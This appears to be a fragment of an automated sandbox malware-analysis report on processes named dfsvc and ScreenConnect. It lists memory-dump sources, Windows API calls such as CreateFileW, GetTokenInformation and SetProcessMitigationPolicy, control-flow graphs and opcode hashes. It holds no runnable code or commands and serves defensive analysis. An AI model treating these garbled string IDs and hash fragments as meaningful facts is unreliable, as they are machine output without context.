                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb8842ca23b44b9ec8193c7dce4d9fccdff621c3311e502ea96cad1af79c5b54
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5B16D21A0EEC90FD755D7BC48696B83FD1EF9A310B0841BFD099C71E7DE28A9068341
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2543831025.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_dfsvc.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CookieInternet
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 930238652-0
                                                                                                                                                                                                                                                  • Opcode ID: c31f127f917d7ba015ed40c9a5f7c1a500ae8055ca92457d3bb232d8d06b61c8
                                                                                                                                                                                                                                                  • Instruction ID: e3329efa4a9722464383ee55f9a3ae07dda3ac0a5e1a61d5ede457f024e9bdbd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c31f127f917d7ba015ed40c9a5f7c1a500ae8055ca92457d3bb232d8d06b61c8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA911130608B8D8FDB69DF28C8557E93BE1FF59311F04426FE84DC72A2CA74A9458B81
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2543831025.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_dfsvc.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                  • Opcode ID: d19d257bcfd09fc38e46ce8ae2b54612fef9d247faa0fd09d8179bf0189a6c72
                                                                                                                                                                                                                                                  • Instruction ID: 3126f5c6603b494916615c537f2746edb3e374546c34fd2dcb1d348abc4bd380
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d19d257bcfd09fc38e46ce8ae2b54612fef9d247faa0fd09d8179bf0189a6c72
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C751A131A0CA4C8FDB68DF58D845BE9BBE0FB59310F1442AEE04DD3252CB34A946CB81
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2543467810.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b76d000_dfsvc.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b8edb6b203a6488a6bc6720d5bd6f35b82bfcf8f072f7388c9dc1637e6a8b42d
                                                                                                                                                                                                                                                  • Instruction ID: 076d3d603030fe447b592a469af87ee0979041814cf6fcff0c9dd5aa2bfd027d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8edb6b203a6488a6bc6720d5bd6f35b82bfcf8f072f7388c9dc1637e6a8b42d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2414B3190DBC88FE796CB3898559523FF0EF52320B0502DFD088CB1B7D625A846CBA2

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:12.6%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:12
                                                                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                                                                  execution_graph 12033 7ffd9b8884b8 12034 7ffd9b8884f6 SetProcessMitigationPolicy 12033->12034 12035 7ffd9b888552 12034->12035 12029 7ffd9b884890 12030 7ffd9b884899 GetTokenInformation 12029->12030 12032 7ffd9b89f2d7 12030->12032 12021 7ffd9b88f67b 12022 7ffd9b88f687 CreateFileW 12021->12022 12024 7ffd9b88f7bc 12022->12024 12025 7ffd9b883dfa 12026 7ffd9b89f470 CloseHandle 12025->12026 12028 7ffd9b89f4eb 12026->12028

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 192 7ffd9b884890-7ffd9b8848d9 198 7ffd9b8848dc 192->198 198->198 199 7ffd9b8848de-7ffd9b884949 198->199 207 7ffd9b88494c 199->207 207->207 208 7ffd9b88494e-7ffd9b89f2d5 GetTokenInformation 207->208 214 7ffd9b89f2d7 208->214 215 7ffd9b89f2dd-7ffd9b89f30e 208->215 214->215
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2146935762.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd9b880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InformationToken
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4114910276-0
                                                                                                                                                                                                                                                  • Opcode ID: 8303f1e3ca5c6d5cdb706581f4011245d1d2236f3d201a2e8b9a02971f137a39
                                                                                                                                                                                                                                                  • Instruction ID: 480b0306db51c97243e3da80a91bde361446ee805ebf54c250e06b07ffb8f820
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8303f1e3ca5c6d5cdb706581f4011245d1d2236f3d201a2e8b9a02971f137a39
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7614A73A1EFC44FE7298B9C6C152A87FE1EB99350F0841BFE098831B7D965AD058381

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 217 7ffd9b88f67b-7ffd9b88f710 222 7ffd9b88f71a-7ffd9b88f7ba CreateFileW 217->222 223 7ffd9b88f712-7ffd9b88f717 217->223 225 7ffd9b88f7bc 222->225 226 7ffd9b88f7c2-7ffd9b88f7f5 222->226 223->222 225->226
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2146935762.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd9b880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                  • Opcode ID: 6aeb582d407c312f6483c00e0281e52127ad1f5ac468382da124ad9306600458
                                                                                                                                                                                                                                                  • Instruction ID: e46bdf633ba8e15d0134c34ccc9e3dba90bdb5b98e1c888972c95c71c9843dbc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6aeb582d407c312f6483c00e0281e52127ad1f5ac468382da124ad9306600458
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF51C371A0DA5C8FDB68DF58D845BE8BBE0FB59310F1442AEE04DD3252CB34A945CB81

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 228 7ffd9b883eaa-7ffd9b8884ef 230 7ffd9b8884f6-7ffd9b888550 SetProcessMitigationPolicy 228->230 231 7ffd9b888558-7ffd9b888587 230->231 232 7ffd9b888552 230->232 232->231
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2146935762.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd9b880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                                                                                                                  • Opcode ID: ebde48901d4fb0e0a6727888cd4f3a000d99a85527c9d4e5f2ce509f71c4eee5
                                                                                                                                                                                                                                                  • Instruction ID: 0f59c87355007011e1644a443ca25e8fec35bd91017b381b5aca8107efee5352
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebde48901d4fb0e0a6727888cd4f3a000d99a85527c9d4e5f2ce509f71c4eee5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7621E97191CB188FDB289F9DDC4A9F977E0EB59711F00413EE059D3251DB74B8468B81

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 234 7ffd9b8884b8-7ffd9b888550 SetProcessMitigationPolicy 236 7ffd9b888558-7ffd9b888587 234->236 237 7ffd9b888552 234->237 237->236
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2146935762.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd9b880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                                                                                                                  • Opcode ID: e959f8196513adba064d0d147b46cad19db1a931746a3b6c4c48b9fad69384cd
                                                                                                                                                                                                                                                  • Instruction ID: 76a36e53f7869e04ad2a3d641252e8f2128d325963cb839f0e97edce0112bc2f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e959f8196513adba064d0d147b46cad19db1a931746a3b6c4c48b9fad69384cd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C831D77191CB188FDB28DF9D9C4A9F97BE0EB59711F00412FE059D3251DB74A846CB82

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 337 7ffd9b883dfa-7ffd9b89f4e9 CloseHandle 340 7ffd9b89f4eb 337->340 341 7ffd9b89f4f1-7ffd9b89f51f 337->341 340->341
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2146935762.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd9b880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                                  • Opcode ID: 66e54f7e0349cfdc6269bc5c304f0cda7a23f51d4a0ddac67d054a2393b9f556
                                                                                                                                                                                                                                                  • Instruction ID: 19aabe1485af1cca6a403889cd18fb95af112fab218ca2fa844d58d2d3be0468
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66e54f7e0349cfdc6269bc5c304f0cda7a23f51d4a0ddac67d054a2393b9f556
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B521D331A08A1C9FDB5CDF98D449BF9BBE0EB69321F10422ED04DD3251DB74A856CB90
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $kq$$kq
                                                                                                                                                                                                                                                  • API String ID: 0-3550614674
                                                                                                                                                                                                                                                  • Opcode ID: 4e496f85631972cd70c5df37e9d86e2c51281acd35c00e0e60c46d333533242d
                                                                                                                                                                                                                                                  • Instruction ID: 667d4750f167e552555df03b8beccc54d48afb3e26bac5b9fdae6278ba0a1096
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e496f85631972cd70c5df37e9d86e2c51281acd35c00e0e60c46d333533242d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4001DF30A09348CFC73AAF35E40C9197FB2EF4A61431644EAE905CB666DB359C05CB41
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 0-76226702
                                                                                                                                                                                                                                                  • Opcode ID: 6195a6185bc5b0a62ff8372acb61b8732f2de7a6fc73e06ca7a76a0659a2e64a
                                                                                                                                                                                                                                                  • Instruction ID: 42a2d9bb884cb33221ffd530c1a7b7cc02cd1aba1f3f19807e34a5faf43d2ed9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6195a6185bc5b0a62ff8372acb61b8732f2de7a6fc73e06ca7a76a0659a2e64a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A51D2347003018FC755EB39D854AAEBBF2AF89614B1485B9D906DB365EF34DC45CB90
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (oq
                                                                                                                                                                                                                                                  • API String ID: 0-3175707579
                                                                                                                                                                                                                                                  • Opcode ID: 1c44c940ba2b4c34d420fb7e44016620f2f848c2491bfdfa0d90a779655752db
                                                                                                                                                                                                                                                  • Instruction ID: d7e69f3117ca313eaecabbf781d6edf2cc4bb441406f4f5336df69eb696318ba
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c44c940ba2b4c34d420fb7e44016620f2f848c2491bfdfa0d90a779655752db
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C071F734B106058FCB14DFA9D494E6EBBB2FF8D715B1181A9E906AB365DB30EC01DB50
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: LRkq
                                                                                                                                                                                                                                                  • API String ID: 0-1052062081
                                                                                                                                                                                                                                                  • Opcode ID: 4cea2c37384eec12ea855b750ad1fd4c54ca0db359900a6220c3cb733e2d7b8f
                                                                                                                                                                                                                                                  • Instruction ID: 3c981fb072ad6efa15e79ee3ce41faf7b7f1628be56304beb403391ee1e386fa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cea2c37384eec12ea855b750ad1fd4c54ca0db359900a6220c3cb733e2d7b8f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2512470B102159FDB259F78E918B6EBBF2FF84B14F14856AE846DB2A5DB309C44C780
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (oq
                                                                                                                                                                                                                                                  • API String ID: 0-3175707579
                                                                                                                                                                                                                                                  • Opcode ID: 6eed93c704ba2ee4279aafbf2d122647fb79ff257bf1c521b014c4b1bbf22acd
                                                                                                                                                                                                                                                  • Instruction ID: b2454464c2a30c3c7c2305cb96971456ee2bf38bc571f73c9a21ee962fd0fdea
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6eed93c704ba2ee4279aafbf2d122647fb79ff257bf1c521b014c4b1bbf22acd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B41C030A00105CBCB18EF69E59496DBFB6FF84714B04C169DD06AB35AEB34E846CBA0
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ['
                                                                                                                                                                                                                                                  • API String ID: 0-410297704
                                                                                                                                                                                                                                                  • Opcode ID: e6543bc384bcb2f6249c052c4edf6c06808f7208333c247e83b3d3093029de60
                                                                                                                                                                                                                                                  • Instruction ID: 18f787540c8a39522e94dcb214dffce2a5102e1153cdae9f2cb9890e1795c612
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6543bc384bcb2f6249c052c4edf6c06808f7208333c247e83b3d3093029de60
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E31C0707407155BC705EB7D985096EBBE2FF8576030086B8D816DB359EF20ED098BD0
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $kq
                                                                                                                                                                                                                                                  • API String ID: 0-3037731980
                                                                                                                                                                                                                                                  • Opcode ID: f3619e665bd946180e01e0a7e8ce905c85d36c49ff0adbf5fd9ca23da5990669
                                                                                                                                                                                                                                                  • Instruction ID: e85e93b2b9084276130ec61a19ae84a3b2ddb11e6f885a612ac1894a60c0e3ed
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3619e665bd946180e01e0a7e8ce905c85d36c49ff0adbf5fd9ca23da5990669
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD31243094E3D08FD7635B7C99A86A8BF60DF5776870A44E7C888CB16FD5148C8AC392
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: P\
                                                                                                                                                                                                                                                  • API String ID: 0-198795799
                                                                                                                                                                                                                                                  • Opcode ID: 9af1eea606210cd0d9514201305e321a0ff53dfb71ebe51502a7ed37bd621346
                                                                                                                                                                                                                                                  • Instruction ID: dbb8dc2456a0b5bbdfe6551573da255238ad655d139b11faff571e5eb6f4f04c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9af1eea606210cd0d9514201305e321a0ff53dfb71ebe51502a7ed37bd621346
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC21FD71B802055BC701EB78E851A6EBFE2EFC5620F148829E415AB358DB30AD09C7E1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: P\
                                                                                                                                                                                                                                                  • API String ID: 0-198795799
                                                                                                                                                                                                                                                  • Opcode ID: 130adfadfc6a9a7bb78823bde236be0405c473fcc1dbd8d41a1ea344e25fab33
                                                                                                                                                                                                                                                  • Instruction ID: 3c1787c5f0a804c86f5c0ba83fc5cd97c51e63463faf16e3f85630b67392188d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 130adfadfc6a9a7bb78823bde236be0405c473fcc1dbd8d41a1ea344e25fab33
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B711D070B802055BC700EB68D841A6EBBE3EFC4620F108928E5099B358DF70AE09C7D1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 75b8174a397256009600212b305858f347f0cb99a7c089e2b387bb627cb855bd
                                                                                                                                                                                                                                                  • Instruction ID: e4ea75868715c995ff40cbf4d618382df4f992304de74cd98e35132ce9fdeb47
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75b8174a397256009600212b305858f347f0cb99a7c089e2b387bb627cb855bd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18610330D053498FC706DF78D854BEDBFB1EF8A300F55859AD040AB2A5EB74A889CB61
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ff9c1debaa62383ea25ef4c74e95ea8bb520faaf0e82d0154d2902846e703892
                                                                                                                                                                                                                                                  • Instruction ID: 5dc9344e83b35e94d0ac509522baeafc2ce404179b735326ddeac2fb5fff8e60
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff9c1debaa62383ea25ef4c74e95ea8bb520faaf0e82d0154d2902846e703892
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8251C130E503099FCB05DFB9D844B9DBBB2FF98310F509669E504AB398DB74A885CB50
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 74f54824dcb020c200b20937f59c249d63c9eb2772bc1f9a618f2702418e92e0
                                                                                                                                                                                                                                                  • Instruction ID: 89d7dec84859dba0010a54e18ef48cb97673830f89bf28c57e577c24970be7c3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74f54824dcb020c200b20937f59c249d63c9eb2772bc1f9a618f2702418e92e0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C512C34600A01CFD768CF29D484966B7F2FF8D724B144A5CE8969B7A4EB31E845CB54
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3f4f38df49dad4f36c2f0c3ec92f2a313399b6979ef45713b8a450dfc25d7e0e
                                                                                                                                                                                                                                                  • Instruction ID: 6d9ba572ecc36fe755fea539120f16e51fbc1a8a741256d86fc31aece85c6e34
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f4f38df49dad4f36c2f0c3ec92f2a313399b6979ef45713b8a450dfc25d7e0e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE413974B007098FCB74DF29D948A6ABBF1FF48754B108A28D856D77A5DB30E845CBA0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ca60c28c7bab9efdec08f0e67ab483b8de05656847b031021c073f8fcc1fbaf7
                                                                                                                                                                                                                                                  • Instruction ID: 32c18c1c6a87d190d8c69416253eeeef72e049455d21693c0b1f4e60de51f63b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca60c28c7bab9efdec08f0e67ab483b8de05656847b031021c073f8fcc1fbaf7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C415A74A00705CFCB74CF29D888AAABBF1FF44764B104A28D856D77A5DB30E845CBA0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
